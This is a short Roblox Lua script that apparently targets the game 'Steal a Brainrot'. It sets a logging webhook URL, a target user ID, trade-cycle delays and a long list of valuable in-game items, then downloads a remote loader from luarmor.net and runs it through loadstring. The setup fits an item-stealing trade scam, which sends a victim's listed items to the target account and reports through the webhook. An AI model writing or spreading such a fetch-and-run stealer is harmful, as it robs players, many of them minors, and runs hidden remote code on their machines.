local genv = getgenv()
local fenv = getfenv()
local env = _G
genv.WEBHOOK_URL = "https://skama.net/api/logs/webhook/mrr_6cd7cd81873842f39b31abc0f6ae7d19"
genv.TARGET_ID = 8888451130
genv.DELAY_STEP = 1
genv.TRADE_CYCLE_DELAY = 2
genv.TARGET_BRAINROTS = {
    ["Los Tralaleritos"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["W or L"] = true,
    ["La Romantic Grande"] = true,
    ["Ginger Gerat"] = true,
    ["Lovin Rose"] = true,
    ["Tuff Toucan"] = true,
    ["Guest 666"] = true,
    ["Los Amigos"] = true,
    ["Skibidi Toilet"] = true,
    ["Bacuru and Egguru"] = true,
    ["Spaghetti Tualetti"] = true,
    ["Los Tacoritas"] = true,
    Cerberus = true,
    Meowl = true,
    ["Fragrama and Chocrama"] = true,
    ["Celularcini Viciosini"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Headless Horseman"] = true,
    ["Spooky and Pumpky"] = true,
    ["Los Spaghettis"] = true,
    ["Tacorita Bicicleta"] = true,
    ["Los Primos"] = true,
    ["Swaggy Bros"] = true,
    ["Swag Soda"] = true,
    ["Festive 67"] = true,
    ["Ketupat Kepat"] = true,
    ["Tang Tang Keletang"] = true,
    ["Sammyni Fattini"] = true,
    ["Capitano Moby"] = true,
    ["La Secret Combinasion"] = true,
    ["La Supreme Combinasion"] = true,
    ["Dragon Cannelloni"] = true,
    ["Gobblino Uniciclino"] = true,
    ["Rosetti Tualetti"] = true,
    ["Lavadorito Spinito"] = true,
    ["Reinito Sleighito"] = true,
    ["Tictac Sahur"] = true,
    ["Esok Sekolah"] = true,
    ["Los Puggies"] = true,
    ["Chipso and Queso"] = true,
    ["Money Money Puggy"] = true,
    ["Mieteteira Bicicleteira"] = true,
    ["Quesadillo Vampiro"] = true,
    ["Love Love Bear"] = true,
    ["Los Candies"] = true,
    ["Burguro And Fryuro"] = true,
    ["Cooki and Milki"] = true,
    ["Strawberry Elephant"] = true,
    ["La Extinct Grande"] = true,
    ["Chillin Chili"] = true,
    ["La Casa Boo"] = true,
    ["Chicliterita bicicliterita"] = true,
    ["La Food Combinasion"] = true,
    ["La Jolly Grande"] = true,
    ["La Spooky Grande"] = true,
    ["Ketupat Bros"] = true,
    ["Garama and Madundung"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["La Taco Combinasion"] = true,
    ["Rosey and Teddy"] = true,
    ["Dragon Gingerini"] = true
}
local HttpGetContent_10 = game:HttpGet("https://api.luarmor.net/files/v4/loaders/9a91b3ba6fb71423853ec2f885c42d67.lua")
local v11 = loadstring(HttpGetContent_10)()